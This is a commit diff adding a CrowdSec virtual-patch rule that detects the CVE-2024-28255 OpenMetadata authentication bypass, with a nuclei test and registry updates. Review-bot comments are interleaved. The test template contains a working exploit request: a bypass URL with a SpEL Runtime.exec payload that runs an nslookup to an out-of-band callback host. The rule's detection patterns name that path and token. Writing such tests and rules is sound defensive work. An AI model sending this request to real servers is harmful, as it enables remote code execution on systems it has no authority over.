Add CVE-2024-28255 (#1082)
* Add CVE-2024-28255

---------

Co-authored-by: GitHub Action <[email protected]>
AlteredCoder and actions-user authored Jul 31, 2024
1 parent ffd0492 commit 1bcbeb1
Showing 6 changed files with 187 additions and 64 deletions.
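--- a/.appsec-tests/vpatch-CVE-2024-28255/config.yaml
+++ b/.appsec-tests/vpatch-CVE-2024-28255/config.yaml
@@ -0,0 +1,5 @@
+
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
+nuclei_template: test-CVE-2024-28255.yaml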
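--- a/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
+++ b/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
@@ -0,0 +1,25 @@
+
+id: test-CVE-2024-28255
+info:
+name: test-CVE-2024-28255
+author: crowdsec
+severity: info
+description: test-CVE-2024-28255 testing
+tags: appsec-testing
+variables:
+callback: "{{interactsh-url}}"
+cmd: "nslookup {{callback}}"
+payload: '{{base64(cmd)}}'
+http:
+- raw:
+- |
+GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1
+Host: {{Hostname}}
+cookie-reuse: true
+matchers:
+- type: dsl
+condition: and
+dsl:
+- "status_code_1 == 403"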
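Review bot: The `matchers` block asserts only `status_code_1 == 403`, so the `callback`, `cmd` and `payload` variables set up an out-of-band channel that nothing in this template checks. The rule under test keys on the request path and the `java.lang.runtime` token rather than on the encoded argument, so an inert constant such as `payload: 'dGVzdA=='` (constructed sample) would exercise the same conditions without carrying a live command if the test is ever run against an instance where the rule is not loaded. `cookie-reuse: true` also looks unnecessary for a single request. A comment above `http:` such as `# passes when the AppSec rule blocks the request with 403` would document what a green result means.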

38 changes: 35 additions & 3 deletions .index.json
@@ -1876,6 +1876,33 @@
"type": "exploit"
}
},
"crowdsecurity/vpatch-CVE-2024-28255": {
"path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml",
"version": "0.1",
"versions": {
"0.1": {
"digest": "a8dcb3b263333cd588e22e561d24c4c7b9da54c1a83fcc8da60b4ac5acfacaae",
"deprecated": false
}
},
"content": "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",
"description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
"author": "crowdsecurity",
"labels": {
"behavior": "http:exploit",
"classification": [
"cve.CVE-2024-28255",
"attack.T1595",
"attack.T1190",
"cwe.CWE-94"
],
"confidence": 3,
"label": "OpenMetadata - Authentication Bypass",
"service": "http",
"spoofable": 0,
"type": "exploit"
}
},
"crowdsecurity/vpatch-CVE-2024-29849": {
"path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-29849.yaml",
"version": "0.5",
@@ -2889,7 +2916,7 @@
},
"crowdsecurity/appsec-virtual-patching": {
"path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
"version": "3.3",
"version": "3.4",
"versions": {
"0.1": {
"digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
@@ -3022,10 +3049,14 @@
"3.3": {
"digest": "7cd4bdca37098a2a398262c253dfa2d2925168b1820cc58ea62ea953a1517722",
"deprecated": false
},
"3.4": {
"digest": "0b89691d948596e37fc998f369d2f782b0357f0036a6752ae5b3811566615236",
"deprecated": false
}
},
"long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBieSB0aGUgW0NJU0EgS25vd24gRXhwbG9pdGVkIFZ1bG5lcmFiaWxpdGllcyBDYXRhbG9nXShodHRwczovL3d3dy5jaXNhLmdvdi9rbm93bi1leHBsb2l0ZWQtdnVsbmVyYWJpbGl0aWVzLWNhdGFsb2cpLiBUaGUgZ29hbCBpcyB0byBwcm92aWRlIHZpcnR1YWwgcGF0Y2hpbmcgY2FwYWJpbGl0aWVzIGZvciB0aGUgbW9zdCBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcGVvcGxlIHNjb3V0aW5nIHlvdXIgYXBwbGljYXRpb25zIGZvciBqdWljeSB2dWxuZXJhYmlsaXRpZXMuCg==",
"content": "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",
"content": "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",
"description": "a generic virtual patching collection, suitable for most web servers.",
"author": "crowdsecurity",
"labels": null,
@@ -3086,7 +3117,8 @@
"crowdsecurity/vpatch-CVE-2023-47218",
"crowdsecurity/vpatch-git-config",
"crowdsecurity/vpatch-CVE-2024-32113",
"crowdsecurity/vpatch-CVE-2024-3272"
"crowdsecurity/vpatch-CVE-2024-3272",
"crowdsecurity/vpatch-CVE-2024-28255"
],
"appsec-configs": [
"crowdsecurity/virtual-patching",
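--- a/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
@@ -0,0 +1,38 @@
+
+name: crowdsecurity/vpatch-CVE-2024-28255
+description: "OpenMetadata - Authentication Bypass (CVE-2024-28255)"
+rules:
+- and:
+- zones:
+- METHOD
+match:
+type: equals
+value: GET
+- zones:
+- URI
+transform:
+- lowercase
+- urldecode
+match:
+type: contains
+value: /api/v1;v1/users/login/events/subscriptions/validation/condition
+- zones:
+- URI_FULL
+transform:
+- lowercase
+match:
+type: contains
+value: "java.lang.runtime"
+
+labels:
+type: exploit
+service: http
+confidence: 3
+spoofable: 0
+behavior: "http:exploit"
+label: "OpenMetadata - Authentication Bypass"
+classification:
+- cve.CVE-2024-28255
+- attack.T1595
+- attack.T1190
+- cwe.CWE-94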
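Review bot: In the `URI` condition the transforms are listed as `lowercase` then `urldecode`; if they run in the listed order, characters that arrive percent-encoded are decoded only after the case fold and keep their original case, so the comparison against the lowercase `value` is not case-insensitive for them. Listing `- urldecode` before `- lowercase` avoids that. The `URI_FULL` condition applies only `lowercase`, so the `java.lang.runtime` token is compared against the still-encoded string; adding `- urldecode` there as well would make the two conditions normalise input the same way. The description and label say "Authentication Bypass" while the third condition and `cwe.CWE-94` concern expression injection, so a comment above `rules:` stating that the rule fires only when the path-parameter bypass is combined with that token would make the intended coverage explicit.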
123 changes: 62 additions & 61 deletions collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -1,64 +1,65 @@
name: crowdsecurity/appsec-virtual-patching
appsec-rules:
- crowdsecurity/base-config
- crowdsecurity/vpatch-env-access
- crowdsecurity/vpatch-CVE-2023-40044
- crowdsecurity/vpatch-CVE-2017-9841
- crowdsecurity/vpatch-CVE-2020-11738
- crowdsecurity/vpatch-CVE-2022-27926
- crowdsecurity/vpatch-CVE-2022-35914
- crowdsecurity/vpatch-CVE-2022-46169
- crowdsecurity/vpatch-CVE-2023-20198
- crowdsecurity/vpatch-CVE-2023-22515
- crowdsecurity/vpatch-CVE-2023-33617
- crowdsecurity/vpatch-CVE-2023-34362
- crowdsecurity/vpatch-CVE-2023-3519
- crowdsecurity/vpatch-CVE-2023-42793
- crowdsecurity/vpatch-CVE-2023-50164
- crowdsecurity/vpatch-CVE-2023-38205
- crowdsecurity/vpatch-CVE-2023-24489
- crowdsecurity/vpatch-CVE-2021-3129
- crowdsecurity/vpatch-CVE-2021-22941
- crowdsecurity/vpatch-CVE-2019-12989
- crowdsecurity/vpatch-CVE-2022-44877
- crowdsecurity/vpatch-CVE-2018-10562
- crowdsecurity/vpatch-CVE-2023-6553
- crowdsecurity/vpatch-CVE-2018-1000861
- crowdsecurity/vpatch-CVE-2019-1003030
- crowdsecurity/vpatch-CVE-2022-22965
- crowdsecurity/vpatch-CVE-2023-23752
- crowdsecurity/vpatch-CVE-2023-49070
- crowdsecurity/vpatch-laravel-debug-mode
- crowdsecurity/vpatch-CVE-2023-28121
- crowdsecurity/vpatch-CVE-2020-17496
- crowdsecurity/vpatch-CVE-2023-1389
- crowdsecurity/vpatch-CVE-2023-7028
- crowdsecurity/vpatch-CVE-2023-46805
- crowdsecurity/vpatch-CVE-2024-23897
- crowdsecurity/vpatch-CVE-2023-22527
- crowdsecurity/vpatch-CVE-2023-35078
- crowdsecurity/vpatch-CVE-2023-35082
- crowdsecurity/vpatch-CVE-2022-22954
- crowdsecurity/vpatch-CVE-2024-1212
- crowdsecurity/vpatch-symfony-profiler
- crowdsecurity/vpatch-connectwise-auth-bypass
- crowdsecurity/vpatch-CVE-2024-22024
- crowdsecurity/vpatch-CVE-2024-27198
- crowdsecurity/vpatch-CVE-2024-3273
- crowdsecurity/vpatch-CVE-2024-4577
- crowdsecurity/vpatch-CVE-2024-29849
- crowdsecurity/vpatch-CVE-2023-47218
- crowdsecurity/vpatch-git-config
- crowdsecurity/vpatch-CVE-2024-32113
- crowdsecurity/vpatch-CVE-2024-3272
appsec-configs:
- crowdsecurity/virtual-patching
- crowdsecurity/appsec-default
- crowdsecurity/virtual-patching
- crowdsecurity/appsec-default
appsec-rules:
- crowdsecurity/base-config
- crowdsecurity/vpatch-env-access
- crowdsecurity/vpatch-CVE-2023-40044
- crowdsecurity/vpatch-CVE-2017-9841
- crowdsecurity/vpatch-CVE-2020-11738
- crowdsecurity/vpatch-CVE-2022-27926
- crowdsecurity/vpatch-CVE-2022-35914
- crowdsecurity/vpatch-CVE-2022-46169
- crowdsecurity/vpatch-CVE-2023-20198
- crowdsecurity/vpatch-CVE-2023-22515
- crowdsecurity/vpatch-CVE-2023-33617
- crowdsecurity/vpatch-CVE-2023-34362
- crowdsecurity/vpatch-CVE-2023-3519
- crowdsecurity/vpatch-CVE-2023-42793
- crowdsecurity/vpatch-CVE-2023-50164
- crowdsecurity/vpatch-CVE-2023-38205
- crowdsecurity/vpatch-CVE-2023-24489
- crowdsecurity/vpatch-CVE-2021-3129
- crowdsecurity/vpatch-CVE-2021-22941
- crowdsecurity/vpatch-CVE-2019-12989
- crowdsecurity/vpatch-CVE-2022-44877
- crowdsecurity/vpatch-CVE-2018-10562
- crowdsecurity/vpatch-CVE-2023-6553
- crowdsecurity/vpatch-CVE-2018-1000861
- crowdsecurity/vpatch-CVE-2019-1003030
- crowdsecurity/vpatch-CVE-2022-22965
- crowdsecurity/vpatch-CVE-2023-23752
- crowdsecurity/vpatch-CVE-2023-49070
- crowdsecurity/vpatch-laravel-debug-mode
- crowdsecurity/vpatch-CVE-2023-28121
- crowdsecurity/vpatch-CVE-2020-17496
- crowdsecurity/vpatch-CVE-2023-1389
- crowdsecurity/vpatch-CVE-2023-7028
- crowdsecurity/vpatch-CVE-2023-46805
- crowdsecurity/vpatch-CVE-2024-23897
- crowdsecurity/vpatch-CVE-2023-22527
- crowdsecurity/vpatch-CVE-2023-35078
- crowdsecurity/vpatch-CVE-2023-35082
- crowdsecurity/vpatch-CVE-2022-22954
- crowdsecurity/vpatch-CVE-2024-1212
- crowdsecurity/vpatch-symfony-profiler
- crowdsecurity/vpatch-connectwise-auth-bypass
- crowdsecurity/vpatch-CVE-2024-22024
- crowdsecurity/vpatch-CVE-2024-27198
- crowdsecurity/vpatch-CVE-2024-3273
- crowdsecurity/vpatch-CVE-2024-4577
- crowdsecurity/vpatch-CVE-2024-29849
- crowdsecurity/vpatch-CVE-2023-47218
- crowdsecurity/vpatch-git-config
- crowdsecurity/vpatch-CVE-2024-32113
- crowdsecurity/vpatch-CVE-2024-3272
- crowdsecurity/vpatch-CVE-2024-28255
author: crowdsecurity
contexts:
- crowdsecurity/appsec_base
description: a generic virtual patching collection, suitable for most web servers.
name: crowdsecurity/appsec-virtual-patching
parsers:
- crowdsecurity/appsec-logs
- crowdsecurity/appsec-logs
scenarios:
- crowdsecurity/appsec-vpatch
contexts:
- crowdsecurity/appsec_base
description: "a generic virtual patching collection, suitable for most web servers."
author: crowdsecurity
- crowdsecurity/appsec-vpatch
22 changes: 22 additions & 0 deletions taxonomy/scenarios.json
@@ -1125,6 +1125,28 @@
"CWE-94"
]
},
"crowdsecurity/vpatch-CVE-2024-28255": {
"name": "crowdsecurity/vpatch-CVE-2024-28255",
"description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
"label": "OpenMetadata - Authentication Bypass",
"behaviors": [
"http:exploit"
],
"mitre_attacks": [
"TA0043:T1595",
"TA0001:T1190"
],
"confidence": 3,
"spoofable": 0,
"cti": true,
"service": "http",
"cves": [
"CVE-2024-28255"
],
"cwes": [
"CWE-94"
]
},
"crowdsecurity/vpatch-CVE-2024-29849": {
"name": "crowdsecurity/vpatch-CVE-2024-29849",
"description": "Veeam Backup Enterprise Manager - Authentication Bypass (CVE-2024-29849)",
